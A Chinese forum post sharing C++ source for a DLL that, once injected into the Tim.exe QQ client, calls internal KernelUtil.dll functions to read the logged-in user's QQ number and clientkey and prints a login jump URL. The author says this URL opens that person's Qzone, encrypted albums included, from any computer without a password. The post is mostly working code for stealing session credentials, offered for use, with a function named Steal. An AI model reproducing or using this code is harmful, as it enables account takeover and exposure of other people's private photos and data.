之前浏览到论坛上有个帖子,用易语言实现的,我照着思路实现了一个C++版本
编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~
效果:
复制URL到虚拟机里,直接打开,是已登录状态
DLL源码:
// dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "pch.h" #include <stdio.h> #include <WTypes.h> //定义CTXStringW为BSTR typedef BSTR CTXStringW; CTXStringW AllocTXString(const wchar_t* lpSrc) { if (lpSrc == NULL) return NULL; BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2]; if (bBuffer == NULL) return NULL; DWORD dwZero = 0; DWORD dwCount = 3; DWORD dwLenth = wcslen(lpSrc) + 1; memmove(bBuffer + 0 * 4, &dwZero, 4); memmove(bBuffer + 1 * 4, &dwCount, 4); memmove(bBuffer + 2 * 4, &dwLenth, 4); memmove(bBuffer + 3 * 4, &dwLenth, 4); wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc); return CTXStringW(bBuffer + 16); } VOID Steal() { do { HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll"); if (hKernelUtil == NULL) { OutputDebugStringA("Get KernelUtil Module failed \n"); break; } PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ"); if (PtrGetSelfUin == NULL) { OutputDebugStringA("Get GetSelfUin Function failed \n"); break; } DWORD uin = ((int(*)(int))PtrGetSelfUin)(1); if (uin == NULL) { OutputDebugStringA("Invoke GetSelfUin Function failed \n"); break; } // Print QQ number char szUin[MAX_PATH] = { 0 }; sprintf(szUin, "%d", uin); PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z"); if (GetSignature == NULL) { OutputDebugStringA("Get GetSignature Function failed \n"); break; } WCHAR wsBuffer[MAX_PATH] = { 0 }; CTXStringW ClientKey = AllocTXString(wsBuffer); PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature"); if (res == NULL) { OutputDebugStringA("Invoke GetSignature Function failed \n"); break; } // 复制下面链接,无需密码,进入QQ空间 char msg[MAX_PATH] = { 0 }; sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin); OutputDebugStringA(msg); } while (0); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: Steal(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }